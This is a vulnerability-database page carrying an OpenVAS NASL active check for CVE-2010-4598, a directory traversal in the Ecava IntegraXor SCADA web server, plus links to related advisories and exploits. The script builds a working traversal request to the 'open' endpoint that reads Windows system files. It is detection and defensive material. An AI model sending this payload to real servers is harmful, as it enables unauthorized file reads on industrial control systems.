ECAVA IntegraXor <= 3.6.4000.0 Directory Traversal Vulnerability - Active Check
🗓️ 27 Dec 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType
openvas🔗 plugins.openvas.org👁 20 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Ecava IntegraXor < 3.6.4000.1 Directory Traversal | 25 Sep 201400:00 | – | nessus | |
| CVE-2010-4598 | 23 Dec 201017:00 | – | cve | |
| CVE-2010-4598 | 23 Dec 201017:00 | – | cvelist | |
| ecava IntegraXor 3.6.4000.0 - Directory Traversal | 21 Dec 201000:00 | – | exploitdb | |
| EUVD-2010-4564 | 7 Oct 202500:30 | – | euvd | |
| GLEG Agora SCADA+ Exploit Pack | 6 Sep 201812:00 | – | ics | |
| CVE-2010-4598 | 23 Dec 201018:00 | – | nvd | |
| Directory traversal | 23 Dec 201018:00 | – | prion | |
| Ecava IntegraXor web service allows directory traversal outside of web root | 11 Jan 201100:00 | – | cert | |
| VulnCheck KEV: CVE-2010-4598 | 12 Jan 202200:00 | – | vulncheck_kev |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/45535 |
| exploit-db | www.exploit-db.com/exploits/15802/ |
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:ecava:integraxor";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.801496");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2010-12-27 09:55:05 +0100 (Mon, 27 Dec 2010)");
script_cve_id("CVE-2010-4598");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_name("ECAVA IntegraXor <= 3.6.4000.0 Directory Traversal Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2010 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_ecava_integraxor_http_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 7131);
script_mandatory_keys("ecava/integraxor/http/detected");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/15802/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/45535");
script_tag(name:"summary", value:"ECAVA IntegraXor is prone to a directory traversal
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"impact", value:"Successful exploitation will allow attackers to download
files from the disk where the server is installed through directory traversal attacks.");
script_tag(name:"insight", value:"The flaw is due to 'open' request, which can be used by an
attacker to download files from the disk where the server is installed.");
script_tag(name:"affected", value:"Ecava IntegraXor version 3.6.4000.0 and prior.");
script_tag(name:"solution", value:"Update to version 3.6.4000.1 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_app");
exit(0);
}
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
if( ! port = get_app_port( cpe:CPE, service:"www" ) )
exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) )
exit( 0 );
if( dir == "/" )
dir = "";
files = traversal_files( "windows" );
foreach pattern( keys( files ) ) {
file = files[pattern];
url = dir + "/open?file_name=..\..\..\..\..\..\..\..\..\..\..\" + file;
if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {
report = http_report_vuln_url( url:url, port:port );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.26482